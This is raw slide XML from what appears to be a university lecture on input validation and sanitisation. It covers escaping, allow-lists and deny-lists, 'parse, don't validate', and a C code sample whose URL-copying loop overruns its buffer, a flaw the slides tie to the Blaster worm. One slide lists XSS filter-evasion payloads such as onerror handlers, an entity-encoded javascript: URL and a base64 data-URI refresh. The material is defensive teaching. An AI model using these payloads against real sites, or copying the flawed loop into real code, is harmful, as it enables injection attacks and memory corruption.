              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>negative</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> security model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en-US" altLang="nl-NL" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill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4ED88A1-B3C9-4439-A8E9-4ACAF8707CFD}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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445"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7020272" y="476672"/>
            <a:ext cx="1728192" cy="19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c) Sanitisation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>aka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> encoding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Commonly applied to prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injection attacks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eg.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replacing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en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933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  by 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\″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 to prevent SQL injection, aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>escaping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replacing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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933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by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GB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to prevent HTML injection &amp; XSS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replacing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GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to prevent XSS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putting quotes around an input, aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>quoting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removing dangerous characters or words, aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filtering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NB after sanitising, changed input may need to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>re-validated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As for validation, we can use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>allow-lists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deny-lists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> for replacing or removing characters or keywords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0774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270576" cy="828676"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" dirty="0" err="1"/>
              <a:t>Validation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" dirty="0" err="1"/>
              <a:t>patterns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get  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="4000" baseline="-25000" dirty="0">
                <a:latin typeface="Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>COMPLEX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>          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A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>regular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expression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validate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t> email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>adressess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/>
              <a:t>See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://emailregex.com  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t> code samples in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1"/>
              <a:t>various</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1"/>
              <a:t>languages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Or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1"/>
              <a:t>read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1"/>
              <a:t>RFCs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t> 821, 822, 1035, 1123, 2821, 2822, 3696, 4291, 5321, 5322, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t> 5952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try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1"/>
              <a:t>yourself</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>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46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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8" y="1628800"/>
            <a:ext cx="7977462" cy="23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868B-948F-361E-A1BF-66E5A78F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Parse, don’t validate!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12FF-9CFB-6E9D-1915-2F49E886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8134672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If input validation requires  parsing,  then parse &amp; don’t just validate!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="7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instead of having a validation function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>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isValidURL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we could have a parsing function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createURL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throws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InvalidURLException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which returns some datatype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 (e.g. an object, record, or struct) that comes with relevant operations, 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to extract domain, protocol.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/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Advantages?  Disadvantages?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You cannot forget validation, as then code won’t type check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No duplication of parsing code  -  in validation &amp; subsequent parsing.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More work, at least initially, to define all these types such as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en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>          Though maintenance should be easier...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4239-5AE3-3799-122F-68D147B5F8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7041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06679513-5F1D-240D-9F0C-57F93F69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altLang="nl-NL" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spot the defect  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0A47DF6-0F72-13AF-1271-3D2D4EA2D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char </a:t>
            </a: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buf1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>[MAX_SIZE], </a:t>
            </a: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buf2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>[MAX_SIZE];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// make sure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL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altLang="nl-NL" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>is valid URL and fits in buf1 and buf2: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if (!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL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isValid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(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)) return;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if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL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strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(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) &gt; MAX_SIZE – 1) return;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// copy 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 excluding spaces, up to first separator, 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ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. first ’/’, into buf1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     out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = buf1;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do { // skip spaces  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	     if (*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 != ’  ’) *out++ = *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} while (*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++ != ’/’);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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL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strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(buf2, buf1);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633" dirty="0">
              <a:latin typeface="Bahnschrift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D0A77391-0074-657B-A0DC-CEA3E742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6" y="5937481"/>
            <a:ext cx="3893908" cy="28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90" tIns="46795" rIns="89990" bIns="46795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270" dirty="0"/>
              <a:t>[Code sample from presentation by Jon Pincus]</a:t>
            </a:r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F9515811-824A-4F96-0561-50A84E107BAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3635896" y="2971081"/>
            <a:ext cx="5145225" cy="3410247"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal2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Loop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fails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terminate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flaw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1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URLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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without /   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL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Exploited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by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="18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Blaster worm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F7B788B-559E-6268-0E8D-26656C972FEA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48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07864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06679513-5F1D-240D-9F0C-57F93F69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altLang="nl-NL" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Parse, don't validate?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0A47DF6-0F72-13AF-1271-3D2D4EA2D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char </a:t>
            </a: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buf1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>[MAX_SIZE], </a:t>
            </a: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buf2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>[MAX_SIZE];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// make sure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL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altLang="nl-NL" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>is valid URL and fits in buf1 and buf2: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     if (!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="16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isValid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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600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)) return;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if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL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strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(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) &gt; MAX_SIZE – 1) return;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// copy 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latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> excluding spaces, up to first separator, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. first ’/’, into buf1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     out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = buf1;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latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>     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do { // skip spaces  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  	     if (*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600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 != ’  ’) *out++ = *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600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     } while (*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600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url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>++ != ’/’);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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL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strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(buf2, buf1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="454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D0A77391-0074-657B-A0DC-CEA3E742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6" y="5937481"/>
            <a:ext cx="3893908" cy="28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90" tIns="46795" rIns="89990" bIns="46795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270"/>
              <a:t>[Code sample from presentation by Jon Pincus]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Wolk 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF37CEAA-F36D-890D-4D51-4076CCCDF5BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4333659" y="794064"/>
            <a:ext cx="4717032" cy="1610515"/>
          </a:xfrm>
          <a:prstGeom prst="cloud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Why not parse the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"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into  some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b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object/datatype as part of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="18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isValid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1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() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202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method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2439A50-20A8-9457-3E2A-CB2882B2B2E7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88224" y="6227423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49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Wolk 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE76D5DA-098C-BB84-DF2E-602C327C756F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3419872" y="3292875"/>
            <a:ext cx="3816424" cy="2046251"/>
          </a:xfrm>
          <a:prstGeom prst="cloud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(partial) parsing by this loop possibly repeats work done in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1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isValid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1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() </a:t>
            </a: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223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3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="7200" baseline="-25000" dirty="0"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C0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/>
              <a:t>problems</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3600" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3600" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:b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120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err="1"/>
              <a:t>Sanitisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="2400" dirty="0" err="1"/>
              <a:t>nightmares</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="2400" dirty="0"/>
              <a:t>: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800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Many places </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0"/>
              <a:t>to include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>many ways to encode</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1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600" dirty="0" err="1"/>
              <a:t>Eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" dirty="0"/>
              <a:t> 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&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>language="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"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&gt; alert('Hi'); &lt;/script&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" dirty="0"/>
              <a:t>can be injected as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&lt;body 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onload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=alert('Hi')&gt;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&lt;b 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onmouseover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=alert('Hi')&gt;Click here!&lt;/b&gt;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img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src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="http://some.url.that/does/not/exist"   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onerror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=alert('Hi');&gt;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img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src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=j&amp;#X41vascript:alert('Hi')&gt;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&lt;META HTTP-EQUIV="refresh"   CONTENT="0;url=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="16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data:text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL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/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="18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sz="1600" dirty="0"/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sz="1800" dirty="0"/>
              <a:t>Root cause: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2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nl-NL" sz="1800" dirty="0"/>
              <a:t> of HTML format</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1400" dirty="0"/>
              <a:t>https://html.spec.whatwg.org)</a:t>
            </a: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endParaRPr lang="nl-NL" sz="400" dirty="0"/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nl-NL" sz="1400" dirty="0"/>
              <a:t>For a longer lists of XSS evasion tricks, see </a:t>
            </a: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nl-NL" sz="1400" dirty="0"/>
              <a:t>                                       https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1600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6029425-025F-4708-82DA-B9968B98C5E5}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>50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662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/>
              <a:t>Where to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="2400" dirty="0" err="1"/>
              <a:t>canonicalise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valididate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="2400" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="2400" dirty="0" err="1"/>
              <a:t>sanitise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="2400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" alt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Best done at clear </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>choke points </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>in an application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138264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D80A9371-C1C0-4B78-97E5-95D17491F7DD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51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674626" y="1844824"/>
            <a:ext cx="7735915" cy="3749675"/>
            <a:chOff x="714375" y="1500188"/>
            <a:chExt cx="7735915" cy="3749675"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Trapezoid 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5072063" y="3286125"/>
              <a:ext cx="2428875" cy="785813"/>
            </a:xfrm>
            <a:prstGeom prst="trapezoid">
              <a:avLst>
                <a:gd name="adj" fmla="val 124016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38" name="Trapezoid 37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5072063" y="2286000"/>
              <a:ext cx="2428875" cy="714375"/>
            </a:xfrm>
            <a:prstGeom prst="trapezoid">
              <a:avLst>
                <a:gd name="adj" fmla="val 137001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38244" name="Rectangle 38"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5072063" y="4071938"/>
              <a:ext cx="2357437" cy="9144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1285875" y="1500188"/>
              <a:ext cx="2000250" cy="500062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 input</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="16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143000" y="2214563"/>
              <a:ext cx="2357438" cy="278606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dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="16" charset="0"/>
              </a:endParaRP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dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="16" charset="0"/>
              </a:endParaRP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     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     </a:t>
              </a:r>
              <a:endParaRPr lang="en-GB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38248" name="Rectangle 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1258888" y="3068638"/>
              <a:ext cx="573087" cy="288925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49" name="Rectangle 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6072188" y="3000375"/>
